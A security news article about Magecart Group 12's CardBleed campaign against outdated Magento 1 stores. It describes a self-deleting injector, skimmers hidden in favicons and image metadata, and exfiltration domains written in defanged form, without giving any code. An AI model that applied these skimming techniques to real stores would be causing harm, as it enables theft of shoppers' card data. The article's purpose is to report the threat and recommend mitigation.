Security researchers have recently uncovered a sudden surge in cybercriminal activities involving several online businesses, more than 2800+, to be exact.
These e-commerce merchants have one thing in common – they are all running an outdated version of the Magento platform.
Since September, the attacks have been going on. That’s why security researchers have been keeping a close eye and may have suspected a particular group that is most likely behind the chain of online assaults.
Other analysts have also observed several supply chain attacks that hacked into numerous e-commerce websites all at once. These Magecart attacks, such as the Adverline event, have used the same Magento exploits (software considered outdated since June 2020) used by the merchant victims. These simultaneous attacks were dubbed “CardBleed,” a recently documented attack that leverages the “Magento Connect” function to inject a malware named “mysql.php,” which removes itself as soon as the skimmer codes are added to “prototype.js.”
Magecart Group 12, being a highly organized syndicate of hackers, have always been successful in their operations. They were also known as the group that attacked the Olympics Online Ticket Resellers back in February of this year. They have always considered online virtual skimming their bread and butter, a tried-and-tested technique of “FormJacking” involving JavaScript codes designed to capture Credit Card details in real-time and transmitted directly to the group’s encrypted remote-controlled servers. They have made several “upgrades” to their operations – embedding card stealer codes within an image file’s metadata, perform homograph attacks, and hide skimmers within a targeted website’s favicon file.
The group was also credited for the Ant and Cockroach skimmer attacks from August of last year, including the Magento favicon file attack on the website “myicons(dot)net.” The skimmer codes were hidden on fake payment form pages to steal customers’ info and credit card details. Progressively, as soon as one hacking operation is shut down, another one comes in to play, ensuring that the skimming activities are continuous. Security researchers stated that ever since CardBleed was discovered and made public, the hacking group has scrambled and made efforts to make sure their entire operations are mobile and undetected. Their principal skimmer codes and exfiltration process were moved from ajaxcloudflare(dot)com to a recently registered domain – consoler(dot)in.
These innovative efforts have led researchers to believe that the hacking group is continuously evolving, thinking of new ways to invent new skimming processes, and avoiding detection. Acknowledging the almost obsolete nature of Magento 1, the only logical mitigation is to upgrade to Magento 2. That, followed by increased infrastructure security and other safety measures, should help ensure that e-commerce platforms and the online businesses that use them remain operational and safe against possible attacks.
